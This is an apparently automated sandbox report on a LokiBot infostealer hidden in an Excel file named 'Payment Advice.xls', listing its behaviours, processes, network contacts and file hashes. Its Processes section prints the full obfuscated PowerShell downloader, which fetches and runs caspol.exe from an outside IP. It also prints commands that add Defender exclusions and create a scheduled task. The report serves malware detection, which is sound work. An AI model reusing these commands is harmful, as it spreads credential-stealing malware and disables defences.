Malware Analysis Report

2025-04-03 09:49

Sample ID 241120-hkrw3sxqcr
Target Payment Advice.xls
SHA256 f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d
Tags
lokibot collection defense_evasion discovery execution spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d

Threat Level: Known bad

The file Payment Advice.xls was found to be: Known bad.

Malicious Activity Summary

lokibot collection defense_evasion discovery execution spyware stealer trojan

Process spawned unexpected child process

Lokibot family

Lokibot

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Evasion via Device Credential Deployment

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

outlook_win_path

outlook_office_path

Modifies Internet Explorer settings

Uses Volume Shadow Copy WMI provider

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-20 06:48

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-20 06:48

Reported

2024-11-20 06:50

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Payment Advice.xls"

Signatures

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\caspol.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2396 set thread context of 672 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2356 wrote to memory of 2920 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
PID 2356 wrote to memory of 2920 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
PID 2356 wrote to memory of 2920 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
PID 2356 wrote to memory of 2920 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
PID 2920 wrote to memory of 2880 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2920 wrote to memory of 2880 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2920 wrote to memory of 2880 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2920 wrote to memory of 2880 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2920 wrote to memory of 1792 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2920 wrote to memory of 1792 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2920 wrote to memory of 1792 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2920 wrote to memory of 1792 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1792 wrote to memory of 2024 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1792 wrote to memory of 2024 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1792 wrote to memory of 2024 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1792 wrote to memory of 2024 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2920 wrote to memory of 2396 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2920 wrote to memory of 2396 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2920 wrote to memory of 2396 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2920 wrote to memory of 2396 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2396 wrote to memory of 872 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2396 wrote to memory of 872 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2396 wrote to memory of 872 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2396 wrote to memory of 872 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2396 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2396 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2396 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2396 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2396 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\schtasks.exe
PID 2396 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\schtasks.exe
PID 2396 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\schtasks.exe
PID 2396 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\schtasks.exe
PID 2396 wrote to memory of 672 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2396 wrote to memory of 672 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2396 wrote to memory of 672 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2396 wrote to memory of 672 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2396 wrote to memory of 672 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2396 wrote to memory of 672 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2396 wrote to memory of 672 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2396 wrote to memory of 672 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2396 wrote to memory of 672 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2396 wrote to memory of 672 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Payment Advice.xls"

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe

"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\otw1mlif.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9FF8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9FF7.tmp"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp17A6.tmp"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 provit.uk udp
GB 198.244.140.41:443 provit.uk tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 88.221.135.114:80 r11.o.lencr.org tcp
US 192.3.243.136:80 192.3.243.136 tcp
GB 198.244.140.41:443 provit.uk tcp
US 192.3.243.136:80 192.3.243.136 tcp
US 192.3.243.136:80 192.3.243.136 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 88.221.134.146:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp

Files

memory/2904-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2904-1-0x000000007239D000-0x00000000723A8000-memory.dmp

memory/2356-16-0x0000000002B20000-0x0000000002B22000-memory.dmp

memory/2904-17-0x00000000023F0000-0x00000000023F2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1087EC93233409051A3831D3D6C361C8

MD5 0b60282e9ddea43ca313d63ec56740ad
SHA1 e7cc9ff054f23bdd36103a4e90cc9f7e8e8b214a
SHA256 358893a6900a0c0cc4d1457dbe7bcdef7e24b7c437d3623806f23827caac2c13
SHA512 ed83aaf8dd61a513ec6854b3ba948fcfd8d4ffcbefebe082330d320f0c234003ba0b290eada14f79836cffd792931eb19bd3539ab2801c9c00c244e228439024

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1087EC93233409051A3831D3D6C361C8

MD5 aeab53c4be221766e0997a90ac492a53
SHA1 89bdcfa9445c9f33d0e51a6c6921370ea6e24403
SHA256 7d3d8a8c2406b80fc91c9c63de93db2aa6f749445f48d08b0e0f3f15678a021e
SHA512 338218939a07e1f97dc62d6bcd21bf386599dc4bb7c40adfd28b9c64552f1793f8747125f595e00b4f3504b1c5c62f464701ebd3245ce1252ffa132a5cf2cd21

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 90fcda8dc7749167c5e920684000e4a8
SHA1 2394be5abfca7c30a71e34ed81d9d011ac730601
SHA256 ef53413666e6a68c5cd56e85b3d4cb622a709cd38ad8d16ec2a61385f57a0915
SHA512 f7adff87e3e67c70da252bceadc8b7386304331d7358e0e26ee3083b506a1812a610497907b26ad270239702f91bc48bdd0c749c07c1ef5077f411434e0754d8

C:\Users\Admin\AppData\Local\Temp\Cab954D.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta

MD5 50388b1f7dd763e374254a7cba6c8ec5
SHA1 6e6c486bc41a4bb1978c05585c01d2b8d9c60a5d
SHA256 7cc793038da07c244953d691f1206b00811817e1c623b582ef94276cecd6d77a
SHA512 0b2a143d563f62dd913de0ead3af93e27a9216758ae644d5dcf05d234d90771966ee27bc634c3749bf78a87d9656fa4f2b6e1547c4f260df08639136d11a8709

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 2eeb4a7c34d011fd84cf7103097f3c8c
SHA1 aee7d511dbd005470d9188d87523963f8e51e111
SHA256 9dd67160f24b6413d4ae9373ceac4f0b3ee0c0661c18530a135ecd925e768628
SHA512 02364face7984f6eca9ff01181021df0322cdea2ec8f7a76520cda5a28c169dd7333af62b49ae0c4f2feeb79966cabe359472cbebbbeedc7d9384f2f6d08f866

\??\c:\Users\Admin\AppData\Local\Temp\otw1mlif.cmdline

MD5 9ec730c292fdfd118f48d250ac3466d3
SHA1 4ba529358337550a34e8be49158c1948b5fc52dd
SHA256 35aa7f74c5d7394b9cdc2628c7049a7a15d146f9cecd8258345b2bc50d753066
SHA512 4a4c18776fb71b0bf40120363e5372675ae7c8e5e371d36265a5b48ca972c3170a33e59d903d742ef9c778a2555d5fd8d8dc3ee1e798e05f2ac6a948fd30f649

\??\c:\Users\Admin\AppData\Local\Temp\otw1mlif.0.cs

MD5 fe82050659a8b97690d60529499222c1
SHA1 7cc50135852b46dd1e36f2ff98506613db525a68
SHA256 64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a
SHA512 59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f

\??\c:\Users\Admin\AppData\Local\Temp\CSC9FF7.tmp

MD5 41a8dc40c70efa6bf5775c54932ae9b2
SHA1 566803d0f0eb68f5a40d0ee4a4c97f4d1cb41e4a
SHA256 fa364d2712719dab2d293843fe0dde139ea5678d8fb7150631f0f8773cc11847
SHA512 9e85e0852296bb99d52fb690822c87d17f38bfd15b70b3f9b0f591273d311cf5df014efe9938728360ee5f1027cb96613bccbb9821b785d50921d6cc8ec6ebe2

C:\Users\Admin\AppData\Local\Temp\RES9FF8.tmp

MD5 8bd50eb2320e3e082cf10e74ac2f3cb1
SHA1 e358cc9702e00ac0fa32679b7a8e69c50f3f139c
SHA256 5716656e447a48fe25935c564aa6f5db03775cc6921b6a66d0bb8ed3b18e89f0
SHA512 a536a2191fb2424be1c429fe3542d29ebe483ceee828f8f7308df6ef0f092637793d876a75b596467081ec06cd728d562210dba9e903366b7217e68708ba9d01

C:\Users\Admin\AppData\Local\Temp\otw1mlif.dll

MD5 34a5b1399a7df103e1c430299eae1aef
SHA1 58443440e856b94ce9f753bf16991617226a77b8
SHA256 39e0251d2d38705d16a5327ba297c9517973f892f040e7073ead467b69380298
SHA512 0d096e4f4ef3efe12730f8361ab81bd0f78693cde43595588b6438c8d2715413131632c61de2544e3bb2e06f9bee5b089991aba379e19ddf29330eb73e2e0a07

C:\Users\Admin\AppData\Local\Temp\otw1mlif.pdb

MD5 557db3a6fd846646f8104a3ff04e6d7b
SHA1 fcf3b33390a07fa75b5425b7e2f7fb73259d20d9
SHA256 e6e95227ab604ca6b84b3b5e9ad3d2b146b5690a600081ffa4ccc2dea19e872f
SHA512 e4c21bfff07c4128e9864b1e59f1d49eee34036ddfd6f0118fef8f66949b2dfd552a0cd66f5bbb0a9132c8a208eadcd5cbbd5160fd1b82255dc5bb729db81e88

memory/2904-60-0x000000007239D000-0x00000000723A8000-memory.dmp

C:\Users\Admin\AppData\Roaming\caspol.exe

MD5 74061922f1e78c237a66d12a15a18181
SHA1 e31ee444aaa552a100f006e43f0810497a3b0387
SHA256 89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c
SHA512 306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136

memory/2396-70-0x0000000000CC0000-0x0000000000D58000-memory.dmp

memory/2396-71-0x0000000000530000-0x0000000000542000-memory.dmp

memory/2396-72-0x00000000048C0000-0x0000000004924000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 ca796902a55365c5d3ea7b830e93c4f2
SHA1 2eb245c644a0c9fc399d5330b72eef40a0a716af
SHA256 a6cac39f7f8cd6f1e637812a95fdce9782c8d43f7c412a8b8a4e6a8c1cf8b23c
SHA512 d59ded81dbf0ebbe3e90dc5be7ec429f2a29b7d57adb175e8a21c7410413e3721c089cc968b9a6200b798bb93b7615d998d73d2d38948d10532973f1154cf166

C:\Users\Admin\AppData\Local\Temp\tmp17A6.tmp

MD5 644acd672def50f90420e4f03528d496
SHA1 03ddd4937e44f36e9cfbfd97812b8f0cd44fef73
SHA256 f0200586128367b78d108181914aee71aa5e921161c36921a9f98d291f86c2bf
SHA512 31ff4b7640c0a06e83741a132413b4bf85773d14b0a7a5a12306339f76b2fa4a66aa3934bca47ba4a6639ad7861a94c689a4d907ed81c5182e6d551d451bcac3

memory/672-89-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/672-102-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/672-100-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/672-99-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/672-97-0x0000000000400000-0x00000000004A2000-memory.dmp

